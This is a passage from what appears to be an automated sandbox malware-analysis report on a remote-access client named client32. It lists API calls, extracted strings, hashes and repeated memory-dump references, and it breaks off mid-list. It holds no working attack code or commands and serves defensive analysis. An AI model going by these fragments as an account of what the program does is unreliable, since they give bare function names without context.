                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                        • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                        • API String ID: 3518726166-774679399
                                                                                        • Opcode ID: acdbe4835dbf9f086b7ba4344e4d624bd78def567480ca16e1e08394df29c600
                                                                                        • Instruction ID: aebd380d628d0b1599e2b276af2785b4fa2c3b861337a9a0e451ff4e8484ea1a
                                                                                        • Opcode Fuzzy Hash: acdbe4835dbf9f086b7ba4344e4d624bd78def567480ca16e1e08394df29c600
                                                                                        • Instruction Fuzzy Hash: AE915A78E04259AFDB44CFA5D980BEDFBF1FB48304F20815AE909AB344D731A841CB98
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(0000017D,B24479DC,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                        • _memset.LIBCMT ref: 1110F4C2
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                        • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                          • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?,?,00000000,110C1126,00000000,00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 11110008
                                                                                        • CloseHandle.KERNEL32(?), ref: 1110F5F5
                                                                                        • _free.LIBCMT ref: 1110F628
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1110F665
                                                                                        • timeEndPeriod.WINMM(00000001), ref: 1110F677
                                                                                        • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,B24479DC,0000017D,00000001), ref: 1110F681
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                        • String ID: End Record %s$PCIR
                                                                                        • API String ID: 4278564793-2672865668
                                                                                        • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                        • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                        • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                        • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F711B
                                                                                        • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                        • wsprintfA.USER32 ref: 110F7235
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                        • wsprintfA.USER32 ref: 110F7267
                                                                                        • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                        • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                        • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                        • API String ID: 856016564-3838485836
                                                                                        • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                        • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                        • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                        • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                        • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                        • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                        • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                        • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                        • GetDC.USER32(?), ref: 11025085
                                                                                        • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                        • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                        • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                        • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                        • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                        • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                        • String ID:
                                                                                        • API String ID: 4100900918-3916222277
                                                                                        • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                        • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                        • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                        • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 1101F0FE
                                                                                        • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                          • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                          • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                        • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                        • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                        • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                        • _memset.LIBCMT ref: 1101F1CF
                                                                                        • GetMenuItemInfoA.USER32 ref: 1101F20C
                                                                                        • __strdup.LIBCMT ref: 1101F221
                                                                                        • SetMenuItemInfoA.USER32 ref: 1101F279
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                        • String ID: 0$MakeOwnerDraw
                                                                                        • API String ID: 1249465458-1190305232
                                                                                        • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                        • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                        • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                        • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1112B9E6
                                                                                        • GetProcAddress.KERNEL32(00000000,WSAStartup,?), ref: 1112BA03
                                                                                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                                        • GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                                        • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                        • API String ID: 2449869053-2279908372
                                                                                        • Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                                        • Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
                                                                                        • Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                                        • Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94
                                                                                        APIs
                                                                                          • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                          • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                          • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                        • CheckMenuItem.USER32 ref: 1102384D
                                                                                        • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                        • LoadMenuA.USER32 ref: 110239FB
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                        • CheckMenuItem.USER32 ref: 11023A29
                                                                                        • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                        • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                        • PostMessageA.USER32 ref: 11023A99
                                                                                        • DestroyMenu.USER32 ref: 11023AA3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                        • String ID: AddToJournal$Chat
                                                                                        • API String ID: 693070851-2976406578
                                                                                        • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                        • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                                        • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                        • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                                        APIs
                                                                                          • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                          • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                          • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                        • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 2014016395-1677429133
                                                                                        • Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                                        • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                                        • Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                                        • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 11131457
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastShowWindow
                                                                                        • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                        • API String ID: 3252650109-4091810678
                                                                                        • Opcode ID: 6b7386f06e141192f61cafb0ee5b2f9076c210be31482568a81b87e7581885dc
                                                                                        • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                        • Opcode Fuzzy Hash: 6b7386f06e141192f61cafb0ee5b2f9076c210be31482568a81b87e7581885dc
                                                                                        • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F732D
                                                                                        • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7372
                                                                                        • GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0), ref: 110F73C3
                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                        • GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F73FD
                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
